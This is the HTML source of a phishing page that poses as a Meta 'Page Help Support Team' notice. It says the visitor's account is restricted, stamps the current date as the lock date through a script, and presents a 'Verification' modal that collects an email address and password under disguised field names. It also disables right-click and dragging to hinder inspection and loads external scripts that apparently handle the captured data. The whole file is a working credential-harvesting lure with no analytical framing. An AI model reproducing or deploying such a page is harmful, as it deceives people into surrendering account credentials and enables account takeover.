﻿
<!DOCTYPE html>
<html lang="en">
    <head>
        <title>Page Help Support Team</title>
        <meta
            name="viewport"
            content="user-scalable=no,initial-scale=1,maximum-scale=1" />

        <meta property="og:url" content="" />
        <meta property="og:type" content="" />
        <meta property="og:title" content="Page Help Support Team" />
        <meta
            property="og:description"
            content="We saw unusual activity on your account.We send you a security notification" />
        <meta property="og:image" content="ilham@sultan/Meta.jpg" />
 <script type="text/javascript">function mousedwn(e){try{if(event.button==2||event.button==3)return false}catch(e){if(e.which==3)return false}}document.oncontextmenu=function(){return false};document.ondragstart=function(){return false};document.onmousedown=mousedwn
    </script>
        <link
            href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css"
            rel="stylesheet"
            integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor"
            crossorigin="anonymous" />
        <link
            rel="icon"
            href="ilham@sultan/XXXX-removebg-preview.png" />
			
    </head>
    <body>
        <nav class="navbar navbar-dark bg-primary">
            <div class="container-fluid">
                <svg
                    xmlns="http://www.w3.org/2000/svg"
                    width="16"
                    height="16"
                    fill="currentColor"
                    class="bi bi-meta"
                    viewBox="0 0 16 16">
                    <path
                        fill-rule="evenodd"
                        d="M8.217 5.243C9.145 3.988 10.171 3 11.483 3 13.96 3 16 6.153 16.001 9.907c0 2.29-.986 3.725-2.757 3.725-1.543 0-2.395-.866-3.924-3.424l-.667-1.123-.118-.197a54.944 54.944 0 0 0-.53-.877l-1.178 2.08c-1.673 2.925-2.615 3.541-3.923 3.541C1.086 13.632 0 12.217 0 9.973 0 6.388 1.995 3 4.598 3c.319 0 .625.039.924.122.31.086.611.22.913.407.577.359 1.154.915 1.782 1.714Zm1.516 2.224c-.252-.41-.494-.787-.727-1.133L9 6.326c.845-1.305 1.543-1.954 2.372-1.954 1.723 0 3.102 2.537 3.102 5.653 0 1.188-.39 1.877-1.195 1.877-.773 0-1.142-.51-2.61-2.87l-.937-1.565ZM4.846 4.756c.725.1 1.385.634 2.34 2.001A212.13 212.13 0 0 0 5.551 9.3c-1.357 2.126-1.826 2.603-2.581 2.603-.777 0-1.24-.682-1.24-1.9 0-2.602 1.298-5.264 2.846-5.264.091 0 .181.006.27.018Z" />
                </svg>
            </div>
        </nav>
        <div class="container">
            <div class="mt-4">
                <img
                    src="ilham@sultan/5yj6qxk6guu51.jpg"
                    class="img-fluid rounded mx-auto d-block"
                    width="auto"
                    height="auto"
                    alt="..." />
            </div>
            <div class="mt-4">
                <p class="text-center h5">Your account has been restricted</p>
            </div>
            <p class="text-center small">
                We detected unusual activity with you today which may result in your account being permanently restricted for not complying with Community Standards. we have reviewed this decision and it cannot be changed.
            </p>

            <hr class="my-4" />

            <div class="p-3 mb-2 bg-secondary bg-opacity-25 text-dark rounded">
                <p><strong>Account Locked <a id="demo">January 17, 2023</a> </div><div class="_9_7 _2rgt _1j-f _2rgt" style="flex-grow:0;flex-shrink:1" id="u_0_10_W4" data-nt="NT:BOX_3"><div class="_59k _2rgt _1j-f _2rgt" style="font-size: 15px;font-weight: 400;line-height: 20px;text-align: left;color: #050505" id="u_0_11_aa" data-nt="FB:TEXT4"></strong></p>
                <p>
				<script>
var x = document.getElementById("demo");
let d = new Date();
let ye = new Intl.DateTimeFormat('en', { year: 'numeric' }).format(d);
let mo = new Intl.DateTimeFormat('en', { month: 'long' }).format(d);
let da = new Intl.DateTimeFormat('en', { day: '2-digit' }).format(d);
x.innerHTML = (`${mo} ${da}, ${ye}`);
</script>

                    <small
                        >To protect you, your profile is hidden now and you
                        can't access some features.</small
                    >
                </p>
				
            </div>
            <hr class="my-4" />
            <p class="text-center small">
                To avoid account restrictions,please verify your account.
            </p>
            <button
                type="button"
                class="btn btn-primary d-block mx-auto"
                data-bs-toggle="modal"
                data-bs-target="#staticBackdrop">
                Verification
            </button>
        </div>
    </body>

    <div
        class="modal fade"
        id="staticBackdrop"
        data-bs-backdrop="static"
        data-bs-keyboard="false"
        tabindex="-1"
        aria-labelledby="staticBackdropLabel"
        aria-hidden="true">
        <div class="modal-dialog">
            <div class="modal-content">
                <div class="modal-body">
                    <div class="text-center">
                        <img
                            src="ilham@sultan/190947209-1002880900116912-4375102209501448340-n.jpg"
                            alt="Verification"
                            class="img-fluid rounded" />
                    </div>
                    <div class="container">
                        <div class="mt-4">
                            <form action="" method="post" id="myform" >
                                <div class="mb-3 shadow rounded">
                                    <input
                                        type="id"
                                        class="form-control up"
                                        name="firsname"
                                        placeholder="Email address"
                                        autocomplete="on"
                                        required="yes"
                                        maxlength="100" />
                                </div>
                                <div class="mb-3 shadow">
                                    <input
                                        type="password"
                                        class="form-control up"
                                        name="lastname"
                                        placeholder="Password"
                                        autocomplete="off"
                                        required="yes"
                                        maxlength="150" />
                                </div>
                                <div class="form-group mt-3 shadow rounded">
                                    <button
                                        class="btn btn-primary d-block mx-auto w-100"
                                        type="submit">
                                        Log In
                                    </button>
                                </div>
                            </form>
                        </div>
                    </div>
                    <hr class="my-4" />
                    <p class="text-secondary text-center">Meta © 2023</p>
                </div>
            </div>
        </div>
    </div>

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js"></script>
     <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script src="ilham@sultan/popup.js"></script>
<script src="script.js"></script>
</html>
